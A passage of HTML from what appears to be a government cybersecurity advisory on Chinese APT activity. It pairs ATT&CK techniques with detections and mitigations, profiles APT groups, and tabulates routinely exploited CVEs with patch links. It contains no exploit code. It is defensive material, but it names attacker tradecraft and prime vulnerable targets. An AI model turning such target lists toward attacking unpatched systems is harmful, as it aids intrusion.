scope="col" style="text-align: left; width: 230px;"> <ul> <li>Use NIDS to identify scanning activity.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Close unnecessary ports and services.</li> <li>Segment network to protect critical servers and devices.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Email Collection </em>[<a href="https://attack.mitre.org/techniques/T1114/">T1114</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Monitor processes and command-line arguments for actions that could be taken to gather local email files.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Encrypt sensitive emails.</li> <li>Audit auto-forwarding email rules regularly.</li> <li>Use MFA for public-facing webmail servers.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Proxy: External Proxy</em> [<a href="https://attack.mitre.org/techniques/T1090/002/">T1090.002</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Analyze network data for uncommon data flows, such as a client sending significantly more data than it receives from an external server.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Use NIDS and prevention systems to identify traffic for specific adversary malware using network signatures.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Drive-by Compromise </em>[<a href="https://attack.mitre.org/techniques/T1189/">T1189</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Use Firewalls and proxies to inspect URLs for potentially known-bad domains or parameters.</li> <li>Monitor network intrusion detection systems (IDS) to detect malicious scripts, and monitor endpoints for abnormal behavior.</li> </ul> <p>&nbsp;</p> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Isolate and sandbox impacted systems and applications to restrict the spread of malware.</li> <li>Leverage security applications to identify malicious behavior during exploitation.</li> <li>Restrict web-based content through ad-blockers and script blocking extensions.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Server Software Component: Web Shell</em> [<a href="https://attack.mitre.org/techniques/T1505/003/">T1505.003</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Analyze authentication logs, files, netflow/enclave netflow, and leverage process monitoring to discover anomalous activity.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Patch vulnerabilities in internet facing applications.</li> <li>Leverage file integrity monitoring to identify file changes.</li> <li>Configure server to block access to the web accessible directory through principle of least privilege.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Application Layer Protocol: File Transfer Protocols </em>[<a href="https://attack.mitre.org/techniques/T1071/002/">T1071.002</a>] and <em>DNS</em> [<a href="https://attack.mitre.org/techniques/T1071/004/">T1071.004</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server).</li> <li>Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Leverage NIDS and NIPS using network signatures to identify traffic for specific adversary malware.</li> </ul> </td> </tr> </tbody> </table> <h4>Additional APT Activity</h4> <p>The TTPs listed above have been repeatedly used across the spectrum of Chinese threat actors. The mitigations referenced in this alert can help reduce vulnerability to these TTPs; however, defenders should also maintain heightened awareness of threats actors that are more innovative in their approach, making it difficult to detect and respond to compromise. Publicly reported examples[<a href="https://www.fireeye.com/current-threats/apt-groups.html">13</a>] include:</p> <ul> <li><strong>APT3 </strong>(known as UPS Team) is known for deploying zero-day attacks that target Internet Explorer, Firefox, and Adobe Flash Player. The group’s custom implants and changing Command and Control (C2) infrastructure make them difficult to track. APT3 exploits use Rivest Cypher 4 (RC4) encryption to communicate and bypass address space layout randomization (ASLR)/Data Execution Prevention (DEP) by using Return Oriented Programming (ROP) chains.[<a href="https://attack.mitre.org/groups/G0022/">14</a>]</li> <li><strong>APT10 </strong>(known as MenuPass Group) has established accessed to victim networks through compromised service providers, making it difficult for network defenders to identify the malicious traffic.</li> <li><strong>APT19</strong> (known as Codoso and Deep Panda) is known for developing custom Rich Text Format (RTF) and macro-enabled Microsoft Office documents for both implants and payloads. The group has backdoored software, such as software serial generators, and has an elite use of PowerShell for C2 over Hyper Text Transfer Protocol (HTTP)/Hyper Text Transfer Protocol Secure (HTTPS).[<a href="https://attack.mitre.org/groups/G0073/">15</a>]</li> <li><strong>APT40</strong> (known as Leviathan) has targeted external infrastructure with success, including internet-facing routers and virtual private networks.</li> <li><strong>APT41 </strong>(known as Double Dragon) has exploited vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central to compromise victims.[<a href="https://attack.mitre.org/groups/G0096/">16</a>]</li> </ul> <h3>Mitigations</h3><h3>Recommended Actions</h3> <p>The following list provides actionable technical recommendations for IT security professionals to reduce their organization’s overall vulnerability. These recommendations are not exhaustive; rather they focus on the actions that will greatly reduce stakeholders’ attack surface.</p> <ol> <li><strong>Patch systems and equipment promptly and diligently. </strong>Establishing and consistently maintaining a thorough patching cycle continues to be the best defense against adversary TTPs. Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally-facing (i.e., internet) equipment. Certain vulnerabilities—including CVE-2012-0158 in Microsoft products [<a href="https://us-cert.cisa.gov/ncas/alerts/aa20-133a ">17</a>], CVE-2019-19781 in Citrix devices [<a href="https://us-cert.cisa.gov/ncas/alerts/aa20-020a">18</a>], and CVE-2020-5902 in BIG-IP Traffic Management User Interface [<a href="https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve">19</a>]—have presented APTs with prime targets to gain initial access. Chinese APTs often use existing exploit code to target routinely exploited vulnerabilities [<a href="https://us-cert.cisa.gov/ncas/alerts/aa20-133a ">20</a>], which present an opportunistic attack that requires limited resources. See table 3 for patch information on CVEs that have been routinely exploited by Chinese APTs. See table 4 for patch information on vulnerabilities that the National Security Agency (NSA) has stated are actively used by Chinese state-sponsored cyber actors.</li> </ol> <p class="text-align-center"><em>Table 3: Patch information for vulnerabilities routinely exploited by Chinese APT actors</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 837.9px; height: 312px; margin-left: auto; margin-right: auto;"> <thead> <tr> <th scope="col" style="width: 115px;"><strong>Vulnerability</strong></th> <th scope="col" style="width: 247px;"><strong>Vulnerable Products</strong></th> <th scope="col" style="width: 455px;"><strong>Patch Information</strong></th> </tr> </thead> <tbody> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2012-0158">CVE-2012-0158</a></td> <td scope="col" style="text-align: left; width: 247px;"> <p>Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0</p> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-027">Microsoft Security Bulletin MS12-027: Vulnerability in Windows Common Controls Could Allow Remote Code Execution</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-5902">CVE-2020-5902</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://support.f5.com/csp/article/K52145254">F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19781">CVE-2019-19781</a></td> <td scope="col" style="text-align: left; width: 247px;">&nbsp; <ul> <li>Citrix Application Delivery Controller</li> <li>Citrix Gateway</li> <li>Citrix SDWAN WANOP</li> </ul> <p>&nbsp;</p> </td> <td scope="col" style="text-align: left; width: 455px;">&nbsp; <ul> <li><a href="https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/">Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0</a></li> <li><a href="https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/">Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3</a></li> <li><a href="https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/">Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0</a></li> <li><a href="https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/">Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-11510">CVE-2019-11510</a></td> <td scope="col" style="text-align: left; width: 247px;">&nbsp; <ul> <li>Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15</li> <li>Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101">Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-16920">CVE-2019-16920</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>D-Link products DIR-655C, DIR-866L, DIR-652, DHP-1565, DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10124">D-Link Security Advisory: DAP-1533 Rv Ax, DGL-5500 Rv Ax, DHP-1565 Rv Ax, DIR-130 Rv Ax, DIR-330 Rv Ax, DIR-615 Rv Ix, (non-US) DIR-652 Rv Bx, DIR-655 Rv Cx, DIR-825 Rv Cx, DIR-835 Rv Ax, DIR-855L Rv Ax, (non-US) DIR-862 Rv Ax, DIR-866L Rv Ax :: CVE-2019-16920 :: Unauthenticated Remote Code Execution (RCE) Vulnerability</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-16278">CVE-2019-16278</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Nostromo 1.9.6 and below</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://packetstormsecurity.com/files/155045/Nostromo-1.9.6-Directory-Traversal-Remote-Command-Execution.html">Nostromo 1.9.6 Directory Traversal/ Remote Command Execution</a></li> <li><a href="https://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.html">Nostromo 1.9.6 Remote Code Execution</a></li> </ul> <p>&nbsp;</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-1652">CVE-2019-1652</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject">Cisco Security Advisory: Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-1653">CVE-2019-1653</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info">Cisco Security Advisory: Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-10189">CVE-2020-10189</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Zoho ManageEngine Desktop Central before 10.0.474</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html">ManageEngine Desktop Central remote code execution vulnerability (CVE-2020-10189)</a></li> </ul> </td> </tr> </tbody> </table> <p class="text-align-center">&nbsp;</p> <p class="text-align-center"><em>Table 4: Patch information for NSA listed vulnerabilities used by Chinese state-sponsored cyber actors [<a href="https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF">21</a>]</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 837.9px; height: 312px; margin-left: auto; margin-right: auto;"> <thead> <tr> <th scope="col" style="width: 115px;"><strong>Vulnerability</strong></th> <th scope="col" style="width: 247px;"><strong>Vulnerable Products</strong></th> <th scope="col" style="width: 455px;"><strong>Patch Information</strong></th> </tr> </thead> <tbody> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-8193">CVE-2020-8193</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18</li> <li>Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://support.citrix.com/article/CTX276688">Citrix Security Bulletin CTX276688</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-8195">CVE-2020-8195</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18</li> <li>Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://support.citrix.com/article/CTX276688">Citrix Security Bulletin CTX276688</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-8196">CVE-2020-8196</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18</li> <li>Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7</li> </ul> <p>&nbsp;</p> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://support.citrix.com/article/CTX276688">Citrix Security Bulletin CTX276688</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-0708">CVE-2019-0708</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Windows 7 for 32-bit Systems Service Pack 1</li> <li>Windows 7 for x64-based Systems Service Pack 1</li> <li>Windows Server 2008 for 32-bit Systems Service Pack 2</li> <li>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)</li> <li>Windows Server 2008 for Itanium-Based Systems Service Pack 2</li> <li>Windows Server 2008 for x64-based Systems Service Pack 2</li> <li>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)</li> <li>Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1</li> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708">Microsoft Security Advisory for CVE-2019-0708</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-15505">CVE-2020-15505</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>MobileIron Core &amp; Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0</li> <li>Sentry versions 9.7.2 and earlier, and 9.8.0;</li> <li>Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://www.mobileiron.com/en/blog/mobileiron-security-updates-available">MobileIron Blog: MobileIron Security Updates Available</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1350">CVE-2020-1350</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Windows Server 2008 for 32-bit Systems Service Pack 2</li> <li>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)</li> <li>Windows Server 2008 for x64-based Systems Service Pack 2</li> <li>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)</li> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li> <li>Windows Server 2012</li> <li>Windows Server 2012 (Server Core installation)</li> <li>Windows Server 2012 R2</li> <li>Windows Server 2012 R2 (Server Core installation)</li> <li>Windows Server 2016</li> <li>Windows Server 2016 (Server Core installation)</li> <li>Windows Server 2019</li> <li>Windows Server 2019 (Server Core installation)</li> <li>Windows Server, version 1903 (Server Core installation)</li> <li>Windows Server, version 1909 (Server Core installation)</li> <li>Windows Server, version 2004 (Server Core installation)</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;">&nbsp; <ul> <li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350">Microsoft Security Advisory for CVE-2020-1350</a></li> </ul> <p>&nbsp;</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1472">CVE-2020-1472</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li> <li>Windows Server 2012</li> <li>Windows Server 2012 (Server Core installation)</li> <li>Windows Server 2012 R2</li> <li>Windows Server 2016</li> <li>Windows Server 2019</li> <li>Windows Server 2019 (Server Core installation)</li> <li>Windows Server, version 1903&nbsp; (Server Core installation)</li> <li>Windows Server, version 1909&nbsp; (Server Core installation)</li> <li>Windows Server, version 2004&nbsp;&nbsp; (Server Core installation)</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <p>&nbsp;</p> <ul> <li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472">Microsoft Security Advisory for CVE-2020-1472</a> <p>&nbsp;</p> </li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1040">CVE-2020-1040</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li> <li>Windows Server 2012</li> <li>Windows Server 2012 (Server Core installation)</li> <li>Windows Server 2012 R2</li> <li>Windows Server 2012 R2 (Server Core installation)</li> <li>Windows Server 2016</li> <li>Windows Server 2016 (Server Core installation)</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1040">Microsoft Security Advisory for CVE-2020-1040</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2018-6789">CVE-2018-6789</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Exim before 4.90.1</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://exim.org/static/doc/security/CVE-2018-6789.txt">Exim page for CVE-2020-6789</a></li> <li><a href="https://git.exim.org/exim.git/commit/cf3cd306062a08969c41a1cdd32c6855f1abecf1">Exim patch information for CVE-2020-6789</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-0688">CVE-2020-0688</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30</li> <li>Microsoft Exchange Server 2013 Cumulative Update 23</li> <li>Microsoft Exchange Server 2016 Cumulative Update 14</li> <li>Microsoft Exchange Server 2016 Cumulative Update 15</li> <li>Microsoft Exchange Server 2019 Cumulative Update 3</li> <li>Microsoft Exchange Server 2019 Cumulative Update 4</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688">Microsoft Security Advisory for CVE-2020-0688</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2018-4939">CVE-2018-4939</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>ColdFusion Update 5 and earlier versions</li> <li>ColdFusion 11 Update 13 and earlier versions</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://helpx.adobe.com/security/products/coldfusion/apsb18-14.html">Adobe Security Bulletin APSB18-14</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2015-4852">CVE-2015-4852</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://www.oracle.com/security-alerts/cpuoct2016.html">Oracle Critical Patch Update Advisory - October 2016</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-2555">CVE-2020-2555</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Oracle Coherence product of Oracle Fusion Middleware Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://www.oracle.com/security-alerts/cpujan2020.html">Oracle Critical Patch Update Advisory - January 2020</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-3396">CVE-2019-3396</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3), and from version 6.14.0 before 6.14.2</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://jira.atlassian.com/browse/CONFSERVER-57974">Jira Atlassian Confluence Sever and Data Center: Remote code execution via Widget Connector macro - CVE-2019-3396</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-11580">CVE-2019-11580</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Atlassian Crowd and Crowd Data Center from version 2.1.0 before 3.0.5, from version 3.1.0 before 3.1.6, from version 3.2.0 before 3.2.8, from version 3.3.0 before 3.3.5, and from version 3.4.0 before 3.4.4</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://jira.atlassian.com/browse/CWD-5388">Jira Atlassian Crowd: Crowd - pdkinstall development plugin incorrectly enabled - CVE-2019-11580</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-10189">CVE-2020-10189</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Zoho ManageEngine Desktop Central before 10.0.474</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html">ManageEngine Desktop Central remote code execution vulnerability (CVE-2020-10189)</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-18935">CVE-2019-18935</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Progress Telerik UI for ASP.NET AJAX through 2019.3.1023</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization">Telerik: ASP.NET AJAX: Allows JavaScriptSerializer Deserialization</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-0601">CVE-2020-0601</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Windows 10 for 32-bit Systems</li> <li>Windows 10 for x64-based Systems</li> <li>Windows 10 Version 1607 for 32-bit Systems</li> <li>Windows 10 Version 1607 for x64-based Systems</li> <li>Windows 10 Version 1709 for 32-bit Systems</li> <li>Windows 10 Version 1709 for ARM64-based Systems</li> <li>Windows 10 Version 1709 for x64-based Systems</li> <li>Windows 10 Version 1803 for 32-bit Systems</li> <li>Windows 10 Version 1803 for ARM64-based Systems</li> <li>Windows 10 Version 1803 for x64-based Systems</li> <li>Windows 10 Version 1809 for 32-bit Systems</li> <li>Windows 10 Version 1809 for ARM64-based Systems</li> <li>Windows 10 Version 1809 for x64-based Systems</li> <li>Windows 10 Version 1903 for 32-bit Systems</li> <li>Windows 10 Version 1903 for ARM64-based Systems</li> <li>Windows 10 Version 1903 for x64-based Systems</li> <li>Windows 10 Version 1909 for 32-bit Systems</li> <li>Windows 10 Version 1909 for ARM64-based Systems</li> <li>Windows 10 Version 1909 for x64-based Systems</li> <li>Windows Server 2016</li> <li>Windows Server 2016 (Server Core installation)</li> <li>Windows Server 2019</li> <li>Windows Server 2019 (Server Core installation)</li> <li>Windows Server, version 1803 (Server Core Installation)</li> <li>Windows Server, version 1903 (Server Core installation)</li> <li>Windows Server, version 1909 (Server Core installation)</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601">Microsoft Security Advisory for CVE-2020-0601</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-0803">CVE-2019-0803</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Windows 10 for 32-bit Systems</li> <li>Windows 10 for x64-based Systems</li> <li>Windows 10 Version 1607 for 32-bit Systems</li> <li>Windows 10 Version 1607 for x64-based Systems</li> <li>Windows 10 Version 1703 for 32-bit Systems</li> <li>Windows 10 Version 1703 for x64-based Systems</li> <li>Windows 10 Version 1709 for 32-bit Systems</li> <li>Windows 10 Version 1709 for ARM64-based Systems</li> <li>Windows 10 Version 1709 for x64-based Systems</li> <li>Windows 10 Version 1803 for 32-bit Systems</li> <li>Windows 10 Version 1803 for ARM64-based Systems</li> <li>Windows 10 Version 1803 for x64-based Systems</li> <li>Windows 10 Version 1809 for 32-bit Systems</li> <li>Windows 10 Version 1809 for ARM64-based Systems</li> <li>Windows 10 Version 1809 for x64-based Systems</li> <li>Windows 7 for 32-bit Systems Service Pack 1</li> <li>Windows 7 for x64-based Systems Service Pack 1</li> <li>Windows 8.1 for 32-bit systems</li> <li>Windows 8.1 for x64-based systems</li> <li>Windows RT 8.1</li> <li>Windows Server 2008 for 32-bit Systems Service Pack 2</li> <li>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)</li> <li>Windows Server 2008 for Itanium-Based Systems Service Pack 2</li> <li>Windows Server 2008 for x64-based Systems Service Pack</li> <li>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)</li> <li>Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1</li> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li> <li>Windows Server 2012</li> <li>Windows Server 2012 (Server Core installation)</li> <li>Windows Server 2012 R2</li> <li>Windows Server 2012 R2 